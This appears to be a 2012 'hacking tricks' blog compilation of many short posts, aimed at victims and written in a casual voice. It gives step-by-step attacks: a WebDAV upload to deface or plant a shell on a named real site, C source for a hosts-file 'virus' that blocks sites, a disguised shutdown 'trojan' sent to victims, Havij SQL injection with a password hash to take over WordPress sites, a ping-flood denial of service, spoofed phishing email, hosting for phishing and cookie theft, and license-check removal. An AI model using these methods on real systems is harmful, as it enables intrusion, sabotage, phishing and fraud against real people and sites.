Thursday, 26 July 2012

Change Your IP in 20 Sec

The following is a guide on how to change your IP in 30 seconds or less. This can be used if your IP has been banned from a game server, or on gunbound if your IP get's blocked. I've tried this on both Windows XP and Windows 2000, and it has worked
Read It Step By Step:



1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "command" and hit ok

You should now be at an MSDOS prompt screen.

4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"

You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.

8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again

You should now be back to the "Local Area Connection" screen.

15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"
18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address

With a little practice, you can easily get this process down to 15 seconds.

*Note* This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back. 

How to Hack Website with IIS Exploit. [Tutorial]




In IIS Exploit we can upload the Defaced page on the Vulnerable Server without any Login. It is most Easiest  way to Hack any site.
Read It Step By Step :




STEP 1: Click on Start button and open "RUN".







STEP 2: Now Type  this in RUN
%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}





Now A Folder named "Web Folders" will open.


STEP 3: Now "Right-Click" in the folder and Goto "New" and then "Web Folder".



STEP 4: Now type the name of the Vulnerable site in this. e.g." http://autoqingdao.com/ " and click "Next".




STEP 5: Now Click on "Finish"







STEP 6: Now the folder will appear. You can open it and put any deface page or anything.




STEP 7: I put  text file in that folder. Named "securityalert.txt" (you can put a shell or HTML file also). If the file appear in the folder then the Hack is successful but if it don't then the site is not Vulnerable.



Now to view the uploaded site i will go to
 "http://autoqingdao.com/securityalert.txt"
In your case it will be 
" www.[sitename].com/[file name that you uploaded] "

A Virus Program to Block Websites

Hi Friendzzz......

Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done.As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.

This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any of the browser program.










Here is the sourcecode of the virus :-

#include<stdio.h>
#include<dos.h>
#include<dir.h> char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target; int find_root(void);
void block_site(void); int find_root()
{
int done;
struct ffblk ffblk;//File block structure done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
} done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
} done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
} done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
} else return 0;
} void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/ fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
} void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}

Testing :
1. To test, run the compiled module. It will block the sites that is listed in the source code.
2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.
3. To remove the virus type the following the Run. 
%windir%\system32\drivers\etc
4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this 127.0.0.1—————————google.com
5. Delete all such entries which contain the names of blocked sites.
I hope you will like it. So, do it yourself and enjoy.....!!!

Monday, 9 April 2012

How To Remove Time Line







Today I am Up here to give a extention for the removal of the Timeline (Facebook) that had already pissed millions if not multi-millions! At this time no permament way exist to remove Timeline but we 
can mess up our local settings to get the old goody-goody way.

Ye'w Can download the extentions from here:
 
I-E 

Saturday, 7 April 2012

window 7 activated without toolkit


How to Remove Windows Genuine Advantage and KB971033
If you are getting nag screens and are not able to use/install programs because your Windows 7 thinks that the copy is not genuine, you can remove the Windows Genuine Advantage even on a legitimate copy of Windows 7. To remove KB971003, follow these steps:
Open Control PanelSelect Programs and FeaturesSelect Installed UpdatesLook for list item “Update for Microsoft Windows (KB971033)”Select the above item, if listed, and click UninstallClose the Programs and Features Windows after the update is removed
You can then proceed to remove Windows Genuine Advantage tool. Do the following to disable/remove the Windows genuine advantage:
1. Open the Run dialog (Windows key + R), type regedit and press enter key.
2. Press F3 to open the Find dialog. Type WGALOGON in the Find Dialog
3. Delete the folder WGALOGON.
4. Close the registry editor and delete the file WgaTray from your system32 folder and from your 'dllcache' folder located inside the system32 folder.
5. Reboot.
You may be prompted to install Windows Genuine Advantage Notifications, but this option can be deselected.
In order to prevent these files from being installed again, make sure your Windows Update in Control Panel is set to Notify but do not automatically download. This way, you can make sure that you are not downloading the same files again.
Alternate Method to Remove Windows Genuine Advantage
Many people are not able to find the WGA files on their computer. I did some research to assist them remove Windows Genuine Advantage.
1 Press Windows Key + R to open the Run window.
2 In the Run window, type cmd to open the command prompt.
3 At the command prompt, type cd \ and press Enter.
4 Now type dir *wga*.* /s to find the wga files.
Once the results are displayed. Make a note of folders where the wga files are located. You can then navigate to these folders using My Computer and rename the files to remove Windows Genuine Advantage notifications.
Note: You may get “access denied” message while renaming/deleting the wga files. Please use Unlocker or Long Path Tool to release the files. registry editor -  http://www.brighthub.com/guides/registry-editor.aspx 

how to speedup !dea 2g


hello guyz i m going to tell u the simple way of speed up !dea 2g damm easy now! follow these steps because i use this fr past 2 months maxx speed of !dea 2g is 20 kbps but if u convert it into 2.5g speed will twice 20 X 2 = 40 kbps
steps -:
1. activate 3g sent ACT 3G to 12345
2. wait till 3g is activated.
3. then if your fone/modem is 3g capable then change setting into HSPA/UTMS
4. now activate simple 2g plan eg -: rs 15 plan
5. over! your speed will be twice because you hav activated 3g & using 2g plans so company will give you 2.5 g speed.

how to google adsense it will approved in 2 days garanteed







for many days i m waiting for the trick how to approve this ultimate sourse of online earning google adsense google pay highest money per click minimum 0.50$ per click :D
but it will not approve many times. the only way to aaprove it to follow these steps


1. minimum 1000+ page view per day
it will not possible many times so use this way
steps :-
1. create a new gmail account
2. make yourself admin in of your blog with that id.
3. now upload minimum 5-6 videos on youtube with that new gmail account.
4. wait for minimum 400 views
5. then apply for google adsense it will approve add gadget where you want.

some free webhosting sites 

for phishing cookie stealing and other hacking ways you need help from web hosting sites. these sites will helpyou choose your fav site and sign up!!
  1. 110mb - http://110mb.com
  2. 110mb - http://110mb.com
  3. Freehostia - http://freehostia.com
  4.  SuperFreeHost - http://superfreehost.info
  5.   t35 - http://t35.com
  6. ProHosts - http://prohosts.org
  7.  Free Web Hosting Pro - http://freewebhostingpro.com
  8.  PHPNet - http://ph pnet.us
  9.  Awardspace - http://awardspace.com
  10.  Freeweb7 - http://freeweb7.com
  11. Zymic - http://zymic.com
  12. My3gb - http://my3gb. com
  13.  AtSpace - http://atspace.com
  14.  000webhost - http://000webhost.com/
  15.  FreeZoka - http://www.freezoka.com/

how to sent anonymous message online free





hello guyz here is another trick by me sent free anonymous message online for free only for indian users....:p    its free and cool

info -:
- No Registration or Login required.
 - Send Unlimited 160 Characters Sms.

 - Check Message Delivery Report in Real Time.

 - We Don't Include Any Ads Along With Your Sms.

 - Very High Speed Message Delivery System.

http://smsti.in/send-free-sms/ go and sent enjoy :)

your computer speak what you want notepad trick really awesome!


really cool trick just follow these steps
1. open notepad
 

2. copy & paste these codes. in notepad  




          Dim Message, Speak
          Message=InputBox("Enter text","Speak")
          Set Speak=CreateObject("sapi.spvoice")
          Speak.Speak Message



     3. now save your notepad as Speak.vbs or "*.vbs".
 

4. double click on save
 

5. now you will recieve a icon in your pc name speak open speak enter anything which you want that your pc speak.

your pc welcomes you notepad trick



speaks="Welcome to your PC, karan's blog"
Set speech=CreateObject("sapi.spvoice")
speech.Speak speaks



  1. copy the script
  2. open notepad and paste it
  3.  replace your name with karan's blog
 4. now save the script with the name welcome.vbs or shreyashblogz.vbs
 5. double click on save
 6. you will recieve a icon on your desktop open it enjoy!!!


idea airtel 100% working trick 2012










!DEA Try This Trick When Balance Is 1Rs Or Below

* Idea Free Gprs Trick March 2012 : ONLY FOR TIPS AND TRICKS USER 
 
You Need To Create A New Gprs Profile In Your Mobile

Apn : Imis (or) Mmsc
Proxy : 10.4.42.15
 
 
Port : 8080
HP - www.karan-hackingtricks.blogspot.com
 
 
 
airtel Airtel Unlimited Download With 3G,Chat On Facebook 1.you can download unlimited with this proxy 2,you can open facebook with !javascript! enable browser. 3,you can watch youtube video with this proxy 4,you can download from file hosting site "MEDIAFIRE" 5, you can download some others ssl site with this proxy. 6 no resume support. 7,you can use it on PC. PROXY=66.90.79.174 APN=airtelgprs.com PORT=80 HP= www.shreyashtiwari.blogspot.in For beginner: how to use it on pc=open mozzila>advanced>setting>manual configuretion>choose proxy and put above proxy and port. click ok. you are done.

how to earn money from adfly without blogger and websites







ADFLY DETAILZ


hello guyz i m back with another grooming trick you know it very well that adfly provide money from links once you become a publisher of adfly and anyone visitto your link you will get money  so many people are shinking their blog tools download links and if any visitor visit their blog site wana download their tool they will face adfly links first so the admin of the blog or website get money from adfly. so i think you will get money without any blog follow these steps...:p


steps -:

1. create a adfly account
2. shrink some links if you have account on free uploading sites like mediafire ziddu etc
3. now itz over if anyone need softwares provide your adfly shrink link of your software
4. enjoy online earning you can try this with any link and get online earning!

send spam mail [fake mail]




FIRST I MAKE IT CLEAR THAT WE DOES NOT MAKE PEOPLE ETHICAL HACKER HERE ALL THE TRICKZ ARE ONLY FOR KNOWLADGE PURPOSE.

Best Fake Email Sender - Not Going To Spam Folder
Here is new fake email sender for all :p


1. Go This Site here 


 


Step 2. Now, enter the information as shown
From Name: The Sender name which will appear on Email
From Email: The sender
Email addressTo: slave email address
Subject: Subject of the EmailContent-
type: Select text/htmlText: The content of your mail.
Put something which will make yourslave to click on your phisher link.
Step 3. Now enter the captcha & send enjoy bookmark us!!

how to create trojans virus 100% working

first i make it clear that we does not made people ethical hacker here.
TROJANS

A Trojan horse, or Trojan, is a standalone malicious program that does not attempt to infect files unlike a computer virus nor replicate itself with the intent of infecting other computers unlike a computer worm. Trojan horses can make copies of themselves, steal information, or harm their host computer systems.


a trojans virus can shut down victim pc for ever.

1. right click on your desktop.

 2. new > shortcut

3. now enter [[shutdown-s-t 50 -c "trojans virus activated"]]
 
4. next now enter the name internet explorer.
 
5. your virus is created now change itz icon as iternet explorer open select icon shortcut change icon as ie. to make your victim fool
 
6. your virus is created now dont open it upload it on free uploading site like mediafire inside zip folder. and after uploading sent it to your  victim


7. once your victim download and open your software his/her pc is over!

NOTE- this is only for knowladge purpose i hope you understand. try it on ur risk

how to hack wordpress sites







hello guys first i make it clear that all my post are only for knowlagde purpose so we are not responsible for any damage done by you.





Step 1: Open Havij and paste the blog url you are going to hack





Step 2: Now find Databases, Tables.


Step 3: Select wp-users then find tick on all columns. Then click on Get Data.





Step 4: Now select any user and change the user_pass to 

$P$BbCzkVXQ6r.T8znShDPMSzM7Whhubc/



Step 5: Now login with the password hacking truths .

NOTE- This article is only for knowledge purpos

how to make call from pc to mobile free





1.st grab a proxy of any different place then Go to mobivox.com
and click on the sign up option.

2. Fill the form with any kind of stuff excepting the mobile no. You can fill any mobile 
no. u want dont worry , email id and pin.


3. Use ur mobile number/u can use any mobile no. u want to fill the mobile no. box and any pin which u remember/its the passwrd.


4. Now here's the trick lies: Fill the email id with a very different match and end it with @eyepaste.com and copy that address. Now go to the inbox of that email address by going to this link 

http://eyepaste.com/inbox/your email address 

 eg : if u have entered excample@eyepaste.com as ur email address then go to 


       http://eyepaste.com/inbox/example@eyepaste.com


5. U will find a confirmation email if u have done everything right just click on the confirmation link and u will be redirected mobivox now sign in using the same email address and pin and click on log in option.


6. Now select web calls from the upper part of the page and enter ur desired number and country to call.


7. Click the call now button and u are done. 

shut down small websites crash them using DDos attack commant prompt trick


hello guyz i found way to crash websites. but like i say my post are only for knowlage purpose.
Have you ever wanted to DOS attack on a website. Here I am going to write about a tool which is really helpful but it wouldn't be effective on big servers. 






First of all you need to know the IP address of the website you want to crash.
Use ping command in windows to get the ip address of the website.
open CMD and enter ping www.website.com
see the screenshot

1.Find  a target website , mainly the one  with apache server 

for ex we have our website : www.targetwebstie.com

2.Now we have to find ip adress of website so, goto run>typ CMD >then  type ping  www.targetwebsite.com 

3.now you will find the ip adress of website below just copy that ip adress let it for ex : 100.00.0.0

4.Now we have got ip adress to send the packets , now in the next line  type :

      ping 100.00.0.0  -t -l 65500     [Here ip adress is just an example]

now keep your computer as it is for 1 hour

5.after one hour visit the website you will see the website is crashed :p
 
NOTE- This article is only for knowledge purpos.